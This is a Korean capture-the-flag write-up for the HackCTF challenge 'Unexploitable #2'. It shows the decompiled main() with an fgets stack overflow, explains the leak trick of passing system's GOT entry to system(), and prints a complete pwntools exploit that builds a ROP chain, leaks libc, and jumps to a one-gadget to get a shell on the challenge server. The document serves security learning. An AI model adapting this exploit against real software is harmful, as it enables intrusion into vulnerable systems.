[HackCTF]Unexploitable #2

Trick 문제다. system 함수 인자로 함수의 GOT 값을 넣으면 leak이 되면서 오류를 내뿜는 것을 이용하면 된다.

/*
 * Decompiled main() of the challenge binary (IDA-style output; the
 * "[rsp+0h] [rbp-10h]" annotation is the decompiler's stack-frame note).
 *
 * Defect: `s` is a single byte located 0x10 bytes below the saved rbp,
 * yet fgets() is allowed to store up to 64 bytes there. Input longer than
 * 16 bytes overwrites the saved rbp, and from byte 24 onward the return
 * address -- the stack overflow the writeup exploits. The fix is to size
 * the read to the buffer, e.g. `char s[64]; fgets(s, sizeof s, stdin);`.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [rsp+0h] [rbp-10h] -- 16 bytes below the saved rbp, 24 below the return address

  /* _bss_start is the decompiler's name for the output stream; it is only ever
     passed to setvbuf()/fwrite() here -- presumably stdout, confirm in the binary. */
  setvbuf(_bss_start, 0LL, 2, 0LL);   /* mode 2 is _IONBF in glibc: unbuffered */
  setvbuf(stdin, 0LL, 2, 0LL);
  fwrite("Hard RTL ha? You don't even have fflush@dynstr!\n", 1uLL, 0x30uLL, _bss_start); /* 0x30 = exact banner length */
  fgets(&s, 64, stdin);                /* up to 63 bytes + NUL into a 1-byte slot: stack overflow */
  return 0;
}

나 같은 경우는 system 인자에 system의 GOT를 넣고 oneshot을 구해서 main에서 넘겨줬다.

exploit.py

from pwn import *

# Reproduction script for the writeup above. The target's main() reads 64
# bytes with fgets() into a stack slot only 16 bytes below the saved rbp,
# so the input overwrites the saved rbp and then the return address.
#
# NOTE(review): this is Python 2-style pwntools code -- `'\x90'*0x10` (str)
# is concatenated with p64() output (bytes), which raises TypeError on
# Python 3 unless the literals are written as b'...'.
context.arch = 'amd64'
context.log_level = 'debug'  # logs every byte sent/received; noisy but useful for following the leak
e = ELF('./Unexploitable_2')
#p = process('./Unexploitable_2')
p = remote('ctf.j0n9hyun.xyz',3029)
libc = e.libc  # pwntools' guess of the libc the binary loads locally; the offsets below
               # (symbols['system'], 0xf02a4) only hold if the remote uses the same libc build
prdi = 0x0000000000400773 # pop rdi ; ret

# Stage 1 -- leak the libc address of system().
# Stack layout of main(): s sits at rbp-0x10, so 16 bytes of filler reach
# the saved rbp, 'realsung' (8 bytes) overwrites it, and the next 8 bytes
# replace the return address with the start of a short ROP chain:
#   pop rdi ; ret      -> rdi = &GOT[system]
#   system@plt         -> system() is handed the raw GOT bytes as its command string
#   main               -> return to main() for a second input
# The shell cannot run those bytes as a command and echoes them back in its
# error message, which is the leak the writeup describes.
payload = '\x90'*0x10
payload += 'realsung'
payload += p64(prdi)
payload += p64(e.got['system'])
payload += p64(e.plt['system'])
payload += p64(e.symbols['main'])

p.sendlineafter('!\n',payload)  # '!\n' ends the banner that main() prints with fwrite()

# The shell's error line begins with "sh: 1: " followed by the argument it
# could not run. A resolved x86-64 user-space pointer occupies 6 bytes before
# its two zero high bytes, so the GOT entry reads as a 6-byte string; ljust()
# pads it back to a full u64.
p.recvuntil('sh: 1: ')
libc_base = u64(p.recv(6).ljust(8,'\x00')) - libc.symbols['system']
log.info('libc_base : ' + hex(libc_base))

# Stage 2 -- second pass through main(): same 16+8 bytes of filler, then the
# return address becomes libc_base + 0xf02a4, the "oneshot" offset the
# writeup refers to (presumably a one-gadget for this libc build; it is only
# valid for the matching libc version -- TODO confirm).
payload2 = '\x90'*0x10 + 'realsung' + p64(libc_base + 0xf02a4)
p.sendlineafter('!\n',payload2)
p.interactive()